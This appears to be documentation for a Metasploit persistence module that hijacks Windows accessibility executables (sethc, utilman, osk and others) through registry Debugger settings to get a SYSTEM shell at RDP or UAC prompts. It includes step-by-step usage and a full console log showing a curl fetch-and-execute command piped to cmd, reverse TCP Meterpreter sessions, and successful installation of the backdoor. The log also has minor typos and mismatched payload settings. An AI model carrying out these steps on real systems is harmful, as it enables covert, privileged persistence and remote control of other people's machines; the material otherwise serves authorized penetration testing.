## Vulnerable Application This module makes it possible to apply the 'sticky keys' hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting for certain executables. The module options allow for this hack to be applied to: - SETHC (sethc.exe is invoked when SHIFT is pressed 5 times), - UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U), - OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), - DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P), - NARRATOR (Narrator.exe is invoked by pressing WINDOWS+CTR+ENTER), - ATBROKER (AtBroker.exe is invoked by launching accessibility features from the login screen, such as WINDOWS+CTR+ENTER). Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded to the target prior to running the module. ## Verification Steps 1. Get session on target with admin/system privs 2. `use exploit/windows/persistence/accessibility_features_debugger` 3. `set payload ` 4. `set session ` 5. `exploit` 6. Use the key combo to trigger the payload 7. Get a session ## Options ### BINARY The target binary to add the exploit to. Defaults to `SETHC`. Options are: - SETHC - UTILMAN - OSK - DISP ## Scenarios ### Windows 10 1909 (10.0 Build 18363) ``` resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL fetch_command => CURL resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true fetch_pipe => true resource (/root/.msf4/msfconsole.rc)> set lport 4450 lport => 4450 resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 FETCH_URIPATH => w3 resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB FETCH_FILENAME => mkaKJBzbDB resource (/root/.msf4/msfconsole.rc)> to_handler [*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe [*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd [*] Payload Handler Started as Job 0 [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /KAdxHNQrWO8cy5I90gLkHg [*] Adding resource /w3 [*] Started reverse TCP handler on 1.1.1.1:4450 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49842) at 2025-12-05 06:34:00 -0500 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid sServer username: WIN10PROLICENSE\windows meterpreter > sysinfo Computer : WIN10PROLICENSE OS : Windows 10 1909 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/acessibility_features_debugger [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(windows/persistence/acessibility_features_debugger) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(windows/persistence/acessibility_features_debugger) > set session 1 session => 1 msf exploit(windows/persistence/acessibility_features_debugger) > exploit [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. msf exploit(windows/persistence/acessibility_features_debugger) > [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Likely exploitable [*] Payload pathname: C:\Users\windows\AppData\Local\Temp\HQagFFAsQ.exe [+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing SHIFT 5 times. [-] Exploit failed: NoMethodError undefined method `gsub' for nil msf exploit(windows/persistence/acessibility_features_debugger) > rexploit [*] Reloading module... [*] Exploit running as background job 2. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4444 msf exploit(windows/persistence/acessibility_features_debugger) > [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Likely exploitable [*] Payload pathname: C:\Users\windows\AppData\Local\Temp\vEmsvwn.exe [+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing SHIFT 5 times. [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251205.3717/WIN10PROLICENSE_20251205.3717.rc [*] Sending stage (188998 bytes) to 2.2.2.2 [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49843) at 2025-12-05 06:37:30 -0500 msf exploit(windows/persistence/acessibility_features_debugger) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid Server username: WIN10PROLICENSE\windows ```